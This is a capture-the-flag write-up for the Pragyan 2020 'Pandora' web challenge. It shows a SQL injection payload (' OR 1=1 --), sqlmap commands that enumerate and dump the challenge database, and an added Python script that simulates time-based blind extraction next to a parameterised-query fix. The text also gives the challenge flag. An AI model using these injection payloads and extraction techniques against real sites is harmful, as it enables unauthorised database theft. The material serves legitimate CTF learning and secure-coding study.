Pragyan 2020 - Pandora

Posted on mer. 26 février 2020 in CTF

Solved by: 7%

First solvers: nguyendqn
Jake in Pandora needs to save the Na'vi from the human invasion, but he is not sure of the human army's base locations.
Help him find those locations so that he can take them down before they start their move.

link: http://ctf.pragyan.org:14000

We need to create an account with a username and password (admin123 here). Once logged in, the page tells us that we don't have any messages.

A quick test on the NAME parameter with ' OR 1=1 --' shows all the messages. Great! We found a SQL injection. Let's try to get all the data with sqlmap.

Validate the injection

$ sqlmap -u "http://ctf.pragyan.org:14000/profile.php?success=welcome&NAME=admin123" --tamper=space2comment -p "NAME" --cookie="PHPSESSID=0b30b4ce5ebe911385e432ac76ef2e10"  
[...]
[11:49:19] [INFO] GET parameter 'NAME' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
[...]
GET parameter 'NAME' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection point(s) with a total of 80 HTTP(s) requests:
---
Parameter: NAME (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: success=welcome&NAME=admin123' AND (SELECT 5886 FROM (SELECT(SLEEP(5)))YUbz) AND 'iTBY'='iTBY
---
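To make the two tricks above concrete, here is an added example (not part of the original writeup, and not the challenge's own code): a stand-in for the vulnerable profile.php query on an in-memory SQLite database, so it runs offline. It shows the ' OR 1=1 -- bypass that dumps every message next to the parameterised fix, and then the time-based blind extraction that sqlmap's "MySQL >= 5.0.12 AND time-based blind (query SLEEP)" technique performs: one injected condition per request, a sleep when the condition is true, and a binary search over the character's code point. The schema (pandoramsg with owner/body columns) and the rows are constructed; the real column names are unknown beyond the table names the writeup recovers. SLEEP() is registered as a user function because SQLite has none, and the condition uses CASE/unicode()/substr() and sqlite_master, the SQLite equivalents of MySQL's IF/ASCII/SUBSTRING and information_schema.

```python
"""Added example: simulated vulnerable profile.php query + time-based blind extraction.
Not the challenge's code; schema, data and names are assumptions."""
import sqlite3
import time

DELAY = 0.05           # seconds a true condition sleeps (sqlmap used 5s, then tuned to 2s)
THRESHOLD = DELAY / 2  # elapsed time above which the condition is counted as true


def build_db() -> sqlite3.Connection:
    """Constructed sample data standing in for capture_the_flag.pandoramsg."""
    conn = sqlite3.connect(":memory:")
    # SQLite has no SLEEP(); register one so the MySQL-style payload has a delay to trigger.
    conn.create_function("SLEEP", 1, lambda s: time.sleep(s) or 0)
    conn.executescript("""
        CREATE TABLE pandoramsg (owner TEXT, body TEXT);
        INSERT INTO pandoramsg VALUES ('admin123', 'no messages for you');
        INSERT INTO pandoramsg VALUES ('jake',     'base coordinates attached');
        INSERT INTO pandoramsg VALUES ('neytiri',  'meet at the hometree');
    """)
    return conn


def vulnerable_query(conn: sqlite3.Connection, name: str) -> list:
    """The bug: NAME is concatenated straight into the SQL string."""
    sql = "SELECT body FROM pandoramsg WHERE owner = '" + name + "'"
    return [row[0] for row in conn.execute(sql)]


def safe_query(conn: sqlite3.Connection, name: str) -> list:
    """The fix: a bound parameter, so the quote in the payload is just data."""
    sql = "SELECT body FROM pandoramsg WHERE owner = ?"
    return [row[0] for row in conn.execute(sql, (name,))]


def time_oracle(conn: sqlite3.Connection, condition: str) -> bool:
    """One 'request': inject a condition that sleeps when true and measure the delay.
    Mirrors sqlmap's payload shape: admin123' AND (SELECT ... SLEEP ...) AND 'x'='x"""
    payload = (f"admin123' AND (SELECT CASE WHEN ({condition}) "
               f"THEN SLEEP({DELAY}) ELSE 0 END) AND '1'='1")
    t0 = time.monotonic()
    vulnerable_query(conn, payload)
    return time.monotonic() - t0 > THRESHOLD


def blind_extract(conn: sqlite3.Connection, subquery: str, max_len: int = 64) -> str:
    """Recover the string returned by `subquery` one character at a time.
    Each character's code point is found by binary search (7 probes instead of
    up to 127); substr() past the end yields '' whose unicode() is NULL, so the
    condition is never true and the search settles on 0, which ends the loop."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if time_oracle(conn, f"unicode(substr(({subquery}),{pos},1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        out += chr(lo)
    return out


if __name__ == "__main__":
    db = build_db()
    print("bypass :", vulnerable_query(db, "' OR 1=1 -- "))   # every user's messages
    print("fixed  :", safe_query(db, "' OR 1=1 -- "))         # nothing, payload is data
    # Same goal as sqlmap's --tables step: pull a table name out blind, by timing alone.
    print("table  :", blind_extract(db, "SELECT name FROM sqlite_master WHERE type='table'"))
```

The `-- ` in the bypass has a trailing space on purpose: MySQL only treats `--` as a comment start when whitespace follows it, while SQLite does not care, so the spaced form works against both. Against the real target the delay is network round-trip plus SLEEP, which is why sqlmap warns not to stress the connection: a slow request is indistinguishable from a true condition.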

Dump database

$ sqlmap -u "http://ctf.pragyan.org:14000/profile.php?success=welcome&NAME=admin123" --tamper=space2comment -p "NAME" --cookie="PHPSESSID=0b30b4ce5ebe911385e432ac76ef2e10" --dbs
[...]
[11:51:01] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[11:51:16] [INFO] retrieved: 2
[11:51:21] [INFO] adjusting time delay to 2 seconds due to good response times
information_schema
[11:53:55] [INFO] retrieved: capture_the_flag
available databases [2]:
[*] capture_the_flag
[*] information_schema
[...]

Dump tables

$ sqlmap -u "http://ctf.pragyan.org:14000/profile.php?success=welcome&NAME=admin123" --tamper=space2comment -p "NAME" --cookie="PHPSESSID=0b30b4ce5ebe911385e432ac76ef2e10" -D capture_the_flag --tables
[...]
[11:58:26] [INFO] retrieved: pandoralocations
[12:00:44] [INFO] retrieved: pandoramsg
[12:01:25] [INFO] retrieved: pandorausers
Database: capture_the_flag
[3 tables]
+------------------+
| pandoralocations |
| pandoramsg       |
| pandorausers     |
+------------------+

Dump data

$ sqlmap -u "http://ctf.pragyan.org:14000/profile.php?success=welcome&NAME=admin123" --tamper=space2comment -p "NAME" --cookie="PHPSESSID=0b30b4ce5ebe911385e432ac76ef2e10" -D capture_the_flag -T pandoralocations --dump
[...]
Database: capture_the_flag
Table: pandoralocations
[3 entries]
+-------+----------------------------------------+-----------+
| base  | latitude                               | longitude |
+-------+----------------------------------------+-----------+
| base1 | 10.0054 N                              | 45.0245E  |
| base2 | p_ctf{4vengers_455emb1e_0ne_l45t_t1me} | 56.0245e  |
| base3 | 45.9999 S                              | 66.04578W |
+-------+----------------------------------------+-----------+

YEAH! We finally got the flag: p_ctf{4vengers_455emb1e_0ne_l45t_t1me}.